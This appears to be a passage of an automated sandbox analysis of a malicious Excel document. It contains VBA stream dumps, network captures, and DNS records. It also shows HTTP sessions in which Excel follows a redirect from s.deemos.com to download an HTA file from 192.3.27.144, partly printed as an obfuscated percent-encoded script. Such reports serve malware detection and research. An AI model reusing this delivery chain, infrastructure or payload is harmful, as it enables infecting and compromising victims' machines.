                  Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E .
                  Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 a3 ef 90 69 0d 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                  TimestampSource PortDest PortSource IPDest IP
                  Jan 8, 2025 09:55:49.598546982 CET49969443192.168.2.514.103.79.10
                  Jan 8, 2025 09:55:49.598572969 CET4434996914.103.79.10192.168.2.5
                  Jan 8, 2025 09:55:49.598664045 CET49969443192.168.2.514.103.79.10
                  Jan 8, 2025 09:55:49.598886967 CET49969443192.168.2.514.103.79.10
                  Jan 8, 2025 09:55:49.598898888 CET4434996914.103.79.10192.168.2.5
                  Jan 8, 2025 09:55:50.504657984 CET4434996914.103.79.10192.168.2.5
                  Jan 8, 2025 09:55:50.504883051 CET49969443192.168.2.514.103.79.10
                  Jan 8, 2025 09:55:50.521910906 CET49969443192.168.2.514.103.79.10
                  Jan 8, 2025 09:55:50.521923065 CET4434996914.103.79.10192.168.2.5
                  Jan 8, 2025 09:55:50.522195101 CET4434996914.103.79.10192.168.2.5
                  Jan 8, 2025 09:55:50.522273064 CET49969443192.168.2.514.103.79.10
                  Jan 8, 2025 09:55:50.522881985 CET49969443192.168.2.514.103.79.10
                  Jan 8, 2025 09:55:50.563344002 CET4434996914.103.79.10192.168.2.5
                  Jan 8, 2025 09:55:51.038186073 CET4434996914.103.79.10192.168.2.5
                  Jan 8, 2025 09:55:51.038248062 CET4434996914.103.79.10192.168.2.5
                  Jan 8, 2025 09:55:51.038256884 CET49969443192.168.2.514.103.79.10
                  Jan 8, 2025 09:55:51.038297892 CET49969443192.168.2.514.103.79.10
                  Jan 8, 2025 09:55:51.043975115 CET49969443192.168.2.514.103.79.10
                  Jan 8, 2025 09:55:51.043993950 CET4434996914.103.79.10192.168.2.5
                  Jan 8, 2025 09:55:51.046355009 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.051181078 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.051253080 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.051484108 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.056371927 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.518462896 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.518493891 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.518511057 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.518527031 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.518536091 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.518546104 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.518558979 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.518570900 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.518573999 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.518585920 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.518605947 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.518616915 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.518621922 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.518651962 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.518667936 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.523463011 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.523492098 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.523531914 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.523564100 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.523577929 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.523624897 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.605150938 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.605165005 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.605178118 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.605190039 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.605202913 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.605215073 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.605271101 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.605526924 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.605539083 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.605561972 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.605572939 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.605575085 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.605586052 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.605600119 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.605614901 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.605648994 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.606494904 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.606507063 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.606527090 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.606539011 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.606549978 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.606551886 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.606566906 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.606587887 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.606617928 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.607434988 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.607446909 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.607454062 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.607496977 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.607528925 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.607548952 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.607562065 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.607584000 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.607623100 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.610054970 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.610110044 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.691808939 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.691824913 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.691832066 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.691838026 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.691850901 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.691961050 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.691977024 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.691989899 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.692024946 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.692055941 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.692070007 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.692087889 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.692089081 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.692115068 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.692123890 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.692136049 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.692147017 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.692153931 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.692158937 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.692173004 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.692187071 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.692220926 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.692229986 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.692272902 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.693052053 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.693065882 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.693078041 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.693089962 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.693103075 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.693114042 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.693119049 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.693128109 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.693152905 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.693175077 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.693182945 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.693187952 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.693202019 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.693213940 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.693223000 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.693228960 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.693259954 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.693295002 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.693936110 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.693948984 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.693960905 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.693978071 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.693990946 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.694001913 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.694003105 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.694017887 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.694036961 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.694062948 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.694066048 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.694078922 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.694092035 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.694103956 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.694117069 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.694124937 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.694152117 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.694180012 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.694906950 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.694920063 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.694927931 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.694932938 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.694950104 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.694974899 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.695013046 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.738873005 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.738884926 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.738898039 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.738910913 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.738976955 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.739068031 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.778548956 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.778562069 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.778574944 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.778589010 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.778601885 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.778614998 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.778625965 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.778690100 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.778690100 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.778702021 CET8049980192.3.27.144192.168.2.5
                  Jan 8, 2025 09:55:51.778740883 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.778776884 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.901860952 CET4998080192.168.2.5192.3.27.144
                  Jan 8, 2025 09:55:51.901920080 CET4998080192.168.2.5192.3.27.144
                  TimestampSource PortDest PortSource IPDest IP
                  Jan 8, 2025 09:55:48.898964882 CET6420853192.168.2.51.1.1.1
                  Jan 8, 2025 09:55:49.597524881 CET53642081.1.1.1192.168.2.5
                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Jan 8, 2025 09:55:48.898964882 CET192.168.2.51.1.1.10x79feStandard query (0)s.deemos.comA (IP address)IN (0x0001)false
                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Jan 8, 2025 09:54:57.013298988 CET1.1.1.1192.168.2.50xa818No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                  Jan 8, 2025 09:54:57.013298988 CET1.1.1.1192.168.2.50xa818No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                  Jan 8, 2025 09:55:10.629308939 CET1.1.1.1192.168.2.50x1d03No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                  Jan 8, 2025 09:55:10.629308939 CET1.1.1.1192.168.2.50x1d03No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                  Jan 8, 2025 09:55:49.597524881 CET1.1.1.1192.168.2.50x79feNo error (0)s.deemos.com14.103.79.10A (IP address)IN (0x0001)false
                  Jan 8, 2025 09:56:00.377621889 CET1.1.1.1192.168.2.50x2e00No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                  Jan 8, 2025 09:56:00.377621889 CET1.1.1.1192.168.2.50x2e00No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                  • s.deemos.com
                  • 192.3.27.144
                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.549980192.3.27.144807236C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                  TimestampBytes transferredDirectionData
                  Jan 8, 2025 09:55:51.051484108 CET250OUTGET /250/gse/begoodforeverythinggreatthingsformebetterforgood.hta HTTP/1.1
                  Accept: */*
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Connection: Keep-Alive
                  Host: 192.3.27.144
                  Jan 8, 2025 09:55:51.518462896 CET1236INHTTP/1.1 200 OK
                  Date: Wed, 08 Jan 2025 08:55:51 GMT
                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                  Last-Modified: Tue, 07 Jan 2025 16:22:17 GMT
                  ETag: "1b0ad-62b2026074baf"
                  Accept-Ranges: bytes
                  Content-Length: 110765
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: application/hta
                  Data Raw: 3c 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 76 61 72 20 64 20 3d 20 75 6e 65 73 63 61 70 65 28 22 25 33 36 25 33 36 25 33 31 25 33 37 25 33 39 25 36 32 25 36 34 25 33 30 25 33 32 25 33 31 25 33 31 25 36 32 25 36 33 25 36 33 25 33 39 25 33 39 25 32 30 25 36 34 25 32 38 25 33 33 25 32 37 25 33 38 25 33 64 25 33 34 25 32 39 25 36 33 25 34 63 25 35 38 25 35 31 25 35 30 25 32 32 25 30 61 25 32 30 25 35 31 25 34 39 25 35 38 25 34 35 25 36 33 25 34 63 25 35 38 25 35 38 25 35 34 25 37 30 25 34 39 25 35 35 25 35 39 25 34 64 25 35 61 25 32 31 25 36 35 25 33 63 25 37 30 25 33 39 25 32 35 25 37 30 25 32 37 25 35 33 25 35 31 25 35 34 25 34 35 25 35 38 25 34 64 25 34 36 25 35 30 25 34 39 25 36 35 25 36 33 25 34 37 25 35 33 25 35 32 25 35 38 25 34 39 25 35 32 25 35 38 25 32 31 25 36 35 25 32 64 25 32 39 25 32 31 25 32 39 25 35 31 25 35 39 25 35 30 25 34 35 25 35 38 25 34 39 25 32 64 25 32 39 25 37 62 25 36 35 25 36 33 25 32 32 25 30 61 25 32 30 25 34 63 [TRUNCATED]
                  Data Ascii: <script>...(function() { var d = unescape("%36%36%31%37%39%62%64%30%32%31%31%62%63%63%39%39%20%64%28%33%27%38%3d%34%29%63%4c%58%51%50%22%0a%20%51%49%58%45%63%4c%58%58%54%70%49%55%59%4d%5a%21%65%3c%70%39%25%70%27%53%51%54%45%58%4d%46%50%49%65%63%47%53%52%58%49%52%58%21%65%2d%29%21%29%51%59%50%45%58%49%2d%29%7b%65%63%22%0a%20%4c%58%51%50%22%0a%20%46%53%48%5d%22%0a%20%37%27%56%4d%54%38%63%30%25%52%4b%59%45%2b%49%21%65%5a%46%57%27%56%4d%54%58%65%22%0a%48%2d%51%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%0
                  Jan 8, 2025 09:55:51.518493891 CET1236INData Raw: 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39
                  Data Ascii: 9%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%5
                  Jan 8, 2025 09:55:51.518511057 CET448INData Raw: 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39
                  Data Ascii: 9%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%6f%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%0
                  Jan 8, 2025 09:55:51.518527031 CET1236INData Raw: 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25
                  Data Ascii: %09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09
                  Jan 8, 2025 09:55:51.518546104 CET1236INData Raw: 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25
                  Data Ascii: %09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09
                  Jan 8, 2025 09:55:51.518558979 CET1236INData Raw: 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25
                  Data Ascii: %09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09
                  Jan 8, 2025 09:55:51.518570900 CET1236INData Raw: 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25
                  Data Ascii: %09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09
                  Jan 8, 2025 09:55:51.518585920 CET1236INData Raw: 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25
                  Data Ascii: %09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09
                  Jan 8, 2025 09:55:51.518605947 CET1236INData Raw: 25 32 63 25 37 38 25 37 61 25 36 63 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25
                  Data Ascii: %2c%78%7a%6c%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09
                  Jan 8, 2025 09:55:51.518616915 CET776INData Raw: 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25
                  Data Ascii: %09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%65%57%27%36%4d%34%38%71%37%2c%49%30%50%65%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09
                  Jan 8, 2025 09:55:51.523463011 CET1236INData Raw: 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39
                  Data Ascii: 9%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%6c%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.54996914.103.79.104437236C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                  TimestampBytes transferredDirectionData
                  2025-01-08 08:55:50 UTC241OUTGET /fmGZaVnS?&bush=watchful&grandmom=adjoining&hackwork HTTP/1.1
                  Accept: */*
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Host: s.deemos.com
                  Connection: Keep-Alive
                  2025-01-08 08:55:51 UTC462INHTTP/1.1 302 Found
                  Date: Wed, 08 Jan 2025 08:55:50 GMT
                  Content-Type: text/plain; charset=utf-8
                  Content-Length: 102
                  Connection: close
                  X-DNS-Prefetch-Control: off
                  X-Frame-Options: SAMEORIGIN
                  Strict-Transport-Security: max-age=15724800; includeSubDomains
                  X-Download-Options: noopen
                  X-Content-Type-Options: nosniff
                  X-XSS-Protection: 1; mode=block
                  Location: http://192.3.27.144/250/gse/begoodforeverythinggreatthingsformebetterforgood.hta
                  Vary: Accept
                  2025-01-08 08:55:51 UTC102INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 37 2e 31 34 34 2f 32 35 30 2f 67 73 65 2f 62 65 67 6f 6f 64 66 6f 72 65 76 65 72 79 74 68 69 6e 67 67 72 65 61 74 74 68 69 6e 67 73 66 6f 72 6d 65 62 65 74 74 65 72 66 6f 72 67 6f 6f 64 2e 68 74 61
